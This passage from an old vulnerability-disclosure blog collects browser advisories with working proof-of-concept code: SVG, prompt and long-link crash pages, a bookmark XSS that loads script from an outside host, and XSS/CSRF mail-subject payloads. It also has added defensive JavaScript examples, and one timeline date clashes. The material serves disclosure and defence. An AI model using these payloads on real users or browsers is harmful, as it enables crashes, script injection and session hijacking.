Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-75045086477326436952010-08-30T08:55:00.003-07:002010-08-30T09:00:29.590-07:00Safari for windows Invalid SVG text style Webkit.dll DoS###################################################<br />
Safari for Windows Invalid SVG text style Webkit.dll DoS<br />
Vendor URL: www.apple.com<br />
Advisory: <a href="http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html">http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html</a><br />
Vendor notified: Yes, exploit available: YES<br />
###################################################<br />
<br />
Safari for Windows is vulnerable to a denial of service<br />
condition: the issue affects webkit.dll and causes a<br />
crash when Safari tries to render an SVG image whose text<br />
style carries a very long font-size value.<br />
<br />
<br />
<br />
############<br />
versions<br />
############<br />
<br />
Safari for Windows 5.0.1 (7533.17.8)<br />
on Windows 7 Ultimate fully patched.<br />
<br />
<br />
Safari for Windows 5.0.1 (7533.17.8)<br />
on Windows XP Home SP3 fully patched<br />
<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered: 19-08-2010<br />
Vendor notified: 25-08-2010<br />
Vendor response: 26-08-2010<br />
Disclosure: 30-09-2010<br />
<br />
####################<br />
Proof Of Concept<br />
####################<br />
<br />
Save this code as image.svg and open it with Safari. Note that<br />
I have added some "extra" pixels to the font-size in the text style.<br />
<br />
################ BOF image.svg ######################<br />
<br />
<?xml version="1.0"?><br />
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1"><br />
<defs><br />
<mask id="crash"><br />
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074 <br />
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074 <br />
51,121.538 129.666,119.935"<br />
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254) <br />
translate(-52.381 -37.9218)"<br />
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" /><br />
</mask><br />
</defs><br />
<br />
<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;"> <br />
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text><br />
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text><br />
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text><br />
</g><br />
<br />
</svg><br />
<br />
###############EOF####################<br />
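Added example, not the advisory's code: a pre-render check for the two declaration shapes in this advisory and in the Safari CSS DoS PoC earlier on this page, a font-size far beyond any sane bound and a single property value megabytes long. The caps and the unit table are assumptions; the samples are constructed from the PoCs, with the CSS value shortened.

```javascript
// Added example: flag CSS declarations a renderer should refuse before layout.
// Two shapes from the advisories: font-size:111000000pt inside an SVG
// <text style="..."> and a 40 MB value for one property in a <style> block.

const MAX_VALUE_LENGTH = 4096;   // assumed cap on one declaration's value
const MAX_FONT_SIZE_PT = 10000;  // assumed cap on font-size, in pt

// Rough conversion to pt (assumed 12pt base for em/rem); unknown units count as pt.
const UNIT_TO_PT = { pt: 1, px: 0.75, em: 12, rem: 12, in: 72, cm: 28.35, mm: 2.835, pc: 12 };

// Collect "prop: value" declarations from style="" attributes and <style> blocks.
function extractDeclarations(doc) {
  const blocks = [];
  for (const m of doc.matchAll(/style\s*=\s*"([^"]*)"/gi)) blocks.push(m[1]);
  for (const m of doc.matchAll(/style\s*=\s*'([^']*)'/gi)) blocks.push(m[1]);
  for (const m of doc.matchAll(/<style\b[^>]*>([\s\S]*?)<\/style>/gi)) {
    // Keep only the declaration bodies between the braces.
    for (const body of m[1].matchAll(/\{([^}]*)\}/g)) blocks.push(body[1]);
  }
  const decls = [];
  for (const block of blocks) {
    for (const part of block.split(";")) {
      const idx = part.indexOf(":");
      if (idx < 0) continue;
      decls.push({ prop: part.slice(0, idx).trim().toLowerCase(), value: part.slice(idx + 1).trim() });
    }
  }
  return decls;
}

// Returns a list of findings; an empty list means the document passes.
function checkStyles(doc) {
  const findings = [];
  for (const { prop, value } of extractDeclarations(doc)) {
    if (value.length > MAX_VALUE_LENGTH) {
      findings.push({ prop, reason: "oversized-value", length: value.length });
      continue;
    }
    if (prop === "font-size") {
      const m = /^(\d+(?:\.\d+)?)([a-z%]*)$/i.exec(value);
      if (m) {
        const pt = parseFloat(m[1]) * (UNIT_TO_PT[m[2].toLowerCase()] ?? 1);
        if (pt > MAX_FONT_SIZE_PT) findings.push({ prop, reason: "font-size-too-large", pt });
      }
    }
  }
  return findings;
}

// Constructed samples mirroring both PoCs (the CSS value is 10000 chars here, not 40 MB).
const SVG_SAMPLE =
  '<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>' +
  '<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>';
const CSS_SAMPLE =
  "<style type='text/css'>\nbody {shitCSS: " + "A/".repeat(5000) + "}\n</style>";

console.log(checkStyles(SVG_SAMPLE));
console.log(checkStyles(CSS_SAMPLE));
```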
<br />
################# €nd ###############<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-62599487827233995992010-08-19T07:50:00.005-07:002010-08-19T08:00:13.276-07:00Flock Browser 3.0.0.3989 Malformed Bookmark XSS#########################################<br />
Flock Browser 3.0.0.3989 Malformed Bookmark XSS<br />
Vendor URL: http://beta.flock.com/<br />
Advisory: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html<br />
Vendor notified: NO, exploit available: YES<br />
#########################################<br />
<br />
Flock is faster, simpler, and more friendly. Literally. <br />
It's the only sleek, modern web browser with the built-in <br />
ability to keep you up-to-date with your Facebook and Twitter <br />
friends. This browser version (3.0.0.3989) is based on an old<br />
version of the Chromium project.<br />
<br />
<br />
Flock has a flaw that allows cross-site scripting style attacks.<br />
Bookmarks are affected by a persistent XSS through a malformed bookmark title:<br />
it triggers when importing a malformed bookmark from another browser, when adding<br />
a new malformed bookmark, or when importing a bookmark HTML file.<br />
<br />
###############################<br />
Example Of Bookmark html file<br />
###############################<br />
<br />
<!DOCTYPE NETSCAPE-Bookmark-file-1><br />
<!-- This is an automatically generated file.<br />
It will be read and overwritten.<br />
DO NOT EDIT! --><br />
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><br />
<TITLE>Bookmarks</TITLE><br />
<H1>Menú Marcadores</H1><br />
<DL><p><br />
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">&quot;&gt;&lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A><br />
</DL><p><br />
<br />
#####################EOF##################<br />
<br />
It is a persistent script injection: when the user clicks the menu entry to view<br />
the favorites page, or opens the favorites URL directly, the injected script "defaces" this page and the user can no longer access the favorites :)<br />
( URL of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )<br />
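Added example, not Flock's code: a minimal parser for the NETSCAPE-Bookmark-file-1 entries shown above, demonstrating how the entity-encoded title decodes to markup on import, beside a vulnerable and a hardened rendering of the favorites entry. The attacker host is a constructed placeholder.

```javascript
// Added example: how a Netscape-format bookmark title becomes stored markup,
// and why the favorites page must escape it again before rendering.

// Entities a bookmark export uses for the title field.
const ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', "#39": "'" };
function decodeEntities(s) {
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_, name) => ENTITIES[name]);
}

// Minimal parser for the <DT><A HREF="..." ...>title</A> lines. Titles are
// entity-encoded in the file, so the importer decodes them, as Flock's does.
function parseBookmarks(fileText) {
  const entries = [];
  for (const m of fileText.matchAll(/<DT><A\s+HREF="([^"]*)"[^>]*>([\s\S]*?)<\/A>/gi)) {
    entries.push({ href: m[1], title: decodeEntities(m[2]) });
  }
  return entries;
}

// The flaw: the decoded title is concatenated straight into the favorites
// page, so a title of "><script src=...> closes the tag and injects script.
function renderFavoriteUnsafe(entry) {
  return `<a href="${entry.href}" title="${entry.title}">${entry.title}</a>`;
}

// The fix: re-escape every untrusted field at the HTML boundary.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}
function renderFavoriteSafe(entry) {
  const href = escapeHtml(entry.href);
  const title = escapeHtml(entry.title);
  return `<a href="${href}" title="${title}">${title}</a>`;
}

// Constructed sample in the same shape as the advisory's bookmark file.
const BOOKMARK_FILE = `<!DOCTYPE NETSCAPE-Bookmark-file-1>
<TITLE>Bookmarks</TITLE>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605">&quot;&gt;&lt;script src='http://attacker.invalid/x.js'&gt;</A>
<DT><A HREF="http://example.invalid/" ADD_DATE="1282083606">Plain title</A>
</DL><p>`;

const entries = parseBookmarks(BOOKMARK_FILE);
console.log(renderFavoriteUnsafe(entries[0]));  // tag broken open, script injected
console.log(renderFavoriteSafe(entries[0]));    // rendered as inert text
```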
<br />
################# €nd #######################<br />
<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-33779296886840362742010-08-16T13:17:00.002-07:002010-08-16T13:21:18.618-07:00Google Chrome and Chrome frame Prompt DoS###############################################<br />
Google Chrome and Chrome Frame Prompt DoS<br />
Vendor URL: http://www.google.com<br />
Advisory: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br />
Advisory (Spanish): http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br />
Vendor notified: YES, exploit available: YES<br />
###############################################<br />
<br />
This bug was discovered by me, and I have tested it<br />
and investigated it with Climbo from #ayuda-informaticos<br />
on the irc-hispano channel.<br />
<br />
#########<br />
abstract <br />
#########<br />
<br />
Sometimes web applications need to prompt users for some data;<br />
they can prompt via JavaScript code or via HTML forms.<br />
<br />
In the case of JavaScript prompts, what happens if<br />
the data to prompt (the question) is very long?<br />
<br />
################<br />
<br />
Google Chrome is vulnerable to a denial of service<br />
condition via "alert prompts" when the prompt text is very long.<br />
<br />
I don't know if this can be turned into remote code execution or<br />
memory corruption with some heap spray or similar, but I think<br />
that this needs to be analyzed & patched.<br />
<br />
<br />
###################<br />
Versions Tested<br />
###################<br />
<br />
In all cases Chrome is the vector used to trigger<br />
the issue on every system :)<br />
<br />
<br />
######################<br />
MAC OS X leopard 10.5<br />
######################<br />
<br />
Google Chrome 5.0.375.126 (Build oficial 53802) WebKit 533.4<br />
V8 2.1.10.15<br />
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) <br />
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4<br />
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818<br />
<br />
In all cases OS X closes all Chrome windows (Chrome crash).<br />
<br />
<br />
##############<br />
ubuntu 10.04<br />
##############<br />
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04<br />
WebKit 533.4 <br />
V8 2.1.10.14<br />
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 <br />
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4<br />
Command Line /usr/lib/chromium-browser/chromium-browser<br />
<br />
In all cases Chrome is minimized and blocks access to the<br />
"window manager button", so we cannot switch between the applications<br />
that we have open.<br />
<br />
<br />
##################<br />
Windows 7 32 bits<br />
###################<br />
<br />
Google Chrome 5.0.375.86 (Build oficial 49890)<br />
on windows 7 ultimate fully patched.<br />
<br />
It causes a DoS in Chrome, and a DoS in IE8 when<br />
exploited through Google Chrome Frame.<br />
<br />
###############<br />
Debian 2.6.26<br />
###############<br />
<br />
Google Chrome 6.0.472.25 (Build oficial 55113) dev, WebKit 534.3<br />
V8 2.2.24.11<br />
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3<br />
<br />
In all cases Debian closes all Chrome windows (Chrome crash).<br />
<br />
<br />
####################<br />
Proof Of Concepts<br />
####################<br />
<br />
This PoC is for testing on Win7 32 bits: in Chrome,<br />
and in Chrome Frame in conjunction with IE8, where it causes<br />
a DoS in IE8.<br />
<br />
#############################<br />
<meta http-equiv="X-UA-Compatible" content="chrome=1"><br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
This second PoC is for testing on Linux or on Mac OS X<br />
<br />
#######################################<br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
############<br />
References<br />
############<br />
related vuln:<br />
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
<br />
Google chrome bugtrack:<br />
http://code.google.com/p/chromium/issues/detail?id=47617<br />
<br />
################### €nd ###################<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-36209861201760653232010-08-04T08:35:00.002-07:002010-08-04T08:38:08.893-07:00Safari for windows Long link DoS############################################<br />
Safari for Windows Long link DoS<br />
Vendor URL: http://www.apple.com/safari/<br />
Advisory: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html<br />
Vendor notified: Yes, exploit available: YES<br />
############################################<br />
<br />
Safari is vulnerable to a DoS with a very long link.<br />
This issue is exploitable via web links like <a href="very long URL">click here</a><br />
or similar vectors. Safari fails to render the link and<br />
freezes, resulting in a denial of service condition.<br />
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue on Win XP SP3 and on a fully patched Windows 7.<br />
<br />
Win XP sp3:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
windows 7 Ultimate:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered: 29-07-2010<br />
Vendor notified: 31-07-2010<br />
Vendor Response:<br />
Vendor patch:<br />
<br />
####################<br />
Proof Of Concept<br />
####################<br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# safari & k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS<br />
# generate the file open it with safari wait a seconds<br />
######################################################################<br />
<br />
use strict;<br />
use warnings;<br />
<br />
my $archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
print "Usage: $0 <archivo.html>\n";<br />
exit 1;<br />
}<br />
<br />
my $cabecera = "<html>" . "\n";<br />
# about:neterror link whose 'c' parameter is about one million characters long<br />
my $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
my $fin = "</html>";<br />
<br />
my $datos = $cabecera . $payload . $fin;<br />
<br />
# open the output file for writing<br />
open(my $FILE, '>', $archivo) or die "Cannot open $archivo: $!";<br />
print $FILE $datos;<br />
close($FILE);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for his support and for helping me understand the nature of this bug,<br />
and thnx to jajoni for testing it on the Windows 7 x64 version.<br />
<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-15752782263271041052010-08-04T08:18:00.002-07:002010-08-04T08:23:39.743-07:00K-Meleon for windows about:neterror Stack Overflow DoS############################################<br />
K-Meleon for Windows about:neterror Stack Overflow DoS<br />
Vendor URL: http://kmeleon.sourceforge.net/<br />
Advisory: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html<br />
Vendor notified: Yes, exploit available: YES<br />
############################################<br />
<br />
K-Meleon is an extremely fast, customizable, lightweight web browser<br />
based on the Gecko layout engine developed by Mozilla which is also <br />
used by Firefox. K-Meleon is free, open source software released under<br />
the GNU General Public License and is designed specifically for <br />
Microsoft Windows (Win32) operating systems.<br />
<br />
K-Meleon is prone to crashing with a very long URL.<br />
Internal web pages like about:neterror do not limit the number of<br />
characters a user puts in the 'c' and 'd' params, so if we compose a<br />
malformed URL the browser can be crashed easily. This issue is exploitable<br />
via web links like <a href="very long URL">click here</a> or via<br />
window.location.replace('very long url') or similar vectors.<br />
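Added example serving this advisory and the Safari long link DoS above, not the browsers' code: a bounded parser for an internal page's query string that rejects the URL before any oversized 'c' or 'd' value reaches page code. The caps and the parameter name 'u' are assumptions; e, c and d are the names the advisory cites.

```javascript
// Added example: bounded parsing of an internal error page's query string.
// The advisories show K-Meleon and Safari accepting about:neterror links whose
// 'c' parameter is about a million characters long; the defence is to bound
// the URL and every parameter before any of it reaches page code.

const MAX_URL_LENGTH = 8192;      // assumed overall cap for an internal URL
const MAX_PARAM_LENGTH = 2048;    // assumed cap per parameter value
// e, c and d are the names the advisory cites; u is an assumption.
const KNOWN_PARAMS = new Set(["e", "u", "c", "d"]);

// Returns { ok, params, errors }. Splitting is manual so that a hostile value
// is length-checked before it is ever percent-decoded.
function parseInternalPageUrl(url) {
  if (url.length > MAX_URL_LENGTH) {
    return { ok: false, params: {}, errors: [`url too long (${url.length} > ${MAX_URL_LENGTH})`] };
  }
  const errors = [];
  const params = {};
  const q = url.indexOf("?");
  const query = q < 0 ? "" : url.slice(q + 1);
  for (const pair of query.split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const raw = eq < 0 ? "" : pair.slice(eq + 1);
    if (!KNOWN_PARAMS.has(key)) {
      errors.push(`unknown parameter '${key}'`);
      continue;
    }
    if (raw.length > MAX_PARAM_LENGTH) {
      errors.push(`parameter '${key}' too long (${raw.length} > ${MAX_PARAM_LENGTH})`);
      continue;
    }
    try {
      params[key] = decodeURIComponent(raw);
    } catch (e) {
      errors.push(`parameter '${key}' is not valid percent-encoding`);
    }
  }
  return { ok: errors.length === 0, params, errors };
}

// Constructed inputs: a normal error URL, and the shape of the PoC link
// (the real one repeats "/" 1028135 times; 50000 is enough to trip the cap).
const NORMAL_URL = "about:neterror?e=connectionFailure&c=UTF-8&d=The%20connection%20failed";
const HOSTILE_URL = "about:neterror?e=connectionFailure&c=" + "/".repeat(50000);

console.log(parseInternalPageUrl(NORMAL_URL));
console.log(parseInternalPageUrl(HOSTILE_URL).errors);
```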
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue on Win XP SP3 and on a fully patched Windows 7.<br />
<br />
Win XP sp3:<br />
K-Meleon 1.5.3 & 1.5.4 vulnerable (crashes)<br />
K-Meleon 1.6.0a4 vulnerable (crashes)<br />
<br />
windows 7 Ultimate:<br />
K-Meleon 1.5.3 & 1.5.4 vulnerable (crashes)<br />
K-Meleon 1.6.0a4 vulnerable (crashes)<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered: 29-07-2010<br />
Vendor notified: 31-07-2010<br />
Vendor Response:<br />
Vendor patch:<br />
<br />
########################<br />
ASM code stack overflow<br />
########################<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s1600/k-meleon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s200/k-meleon.png" width="200" /></a></div>################ <br />
Proof Of Concept <br />
################ <br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS<br />
# generate the file, open it with K-Meleon, click the link and wait a few seconds<br />
######################################################################<br />
<br />
use strict;<br />
use warnings;<br />
<br />
my $archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
print "Usage: $0 <archivo.html>\n";<br />
exit 1;<br />
}<br />
<br />
my $cabecera = "<html>" . "\n";<br />
# about:neterror link whose 'c' parameter is about one million characters long<br />
my $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
my $fin = "</html>";<br />
<br />
my $datos = $cabecera . $payload . $fin;<br />
<br />
# open the output file for writing<br />
open(my $FILE, '>', $archivo) or die "Cannot open $archivo: $!";<br />
print $FILE $datos;<br />
close($FILE);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for his support and for helping me understand the nature of this bug,<br />
and thnx to jajoni for testing it on the Windows 7 x64 version.<br />
<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-7127686386080026322010-07-13T07:48:00.001-07:002010-07-13T07:51:46.431-07:00IE8 On windows 7 32 bits unspecified DoS##########################################<br />
IE8 On Windows 7 32 bits unspecified DoS<br />
Vendor URL: http://www.microsoft.com<br />
Advisory: http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
Vendor notified: YES, vendor confirmed: YES <br />
Exploit: Private<br />
###########################################<br />
<br />
A possible flaw exists in Internet Explorer 8<br />
on Windows 7 32-bit that can cause a remote<br />
denial of service from a malformed web page.<br />
<br />
This issue is triggered when IE8 tries to render a<br />
modal app prompt in conjunction with a third-party app that<br />
uses resources from IE8 and tries to render text inputs;<br />
it is possibly a bug in the GDI text-rendering<br />
APIs or in the DrawText() functions involved.<br />
<br />
When the victim visits a malformed web page and closes the 2nd<br />
app, that app becomes unstable and needs to close, and then,<br />
when IE8 tries to restore<br />
the tab, it loses the focus from the application and this results in<br />
a denial of service for this window, because we can't click<br />
on any bar or any button or do any action in this window;<br />
IE8 apparently is frozen.<br />
<br />
After several tests this issue is only reproducible on Win7 32 bits.<br />
<br />
I have an exploit or PoC for this issue, but it's<br />
private at this time :)<br />
<br />
Solution:<br />
Microsoft regards this as a stability bug and has added it<br />
for consideration, to be addressed in a future version.<br />
<br />
#################### €nd ##########################<br />
<br />
Thnx for your time !!!<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-20525046171012963252010-06-18T12:09:00.003-07:002010-06-18T12:10:21.085-07:00Google Services Notifier Chrome extension XSS/CSRF######################################<br />
Google Services Notifier Chrome extension XSS/CSRF<br />
Extension: https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
Advisory: http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html<br />
Exploit available: yes, vendor notified: NO<br />
#######################################<br />
<br />
So in this case "Notifier for Google Wave Chrome"<br />
has a flaw that allows attackers to make XSS style attacks.<br />
<br />
All extensions run in their own origin, and there is no way to alter data from the extension<br />
or to get sensitive data like the email account or password, etc.<br />
<br />
If we look at how many users have installed this extension =><br />
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
109 users have installed it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Services Notifier lets users see when they have a new wave and<br />
view a preview of it.<br />
<br />
"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,<br />
Google Docs, Google Wave etc. More services will be added soon."<br />
<br />
If an attacker composes a new mail with HTML or JavaScript code in the<br />
subject and sends it to the victim, the code is executed when the victim clicks<br />
the extension to view a preview of the mail.<br />
<br />
So to exploit this we need to compose a "special" mail:<br />
for example, if we put directly in the mail subject an iframe like<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
in both cases the alert is executed when trying to preview the mail<br />
with the extension :) It is executed in a context where the location.href value is<br />
"about:blank".<br />
<br />
For example, send a mail with a logout action for Google Wave in the body:<br />
"><iframe src="https://wave.google.com/wave/logout"></iframe><br />
It closes the session on Google Wave; this is a CSRF.<br />
<br />
######################€nd#################################<br />
Thnx for your time !!!<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer"></div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.com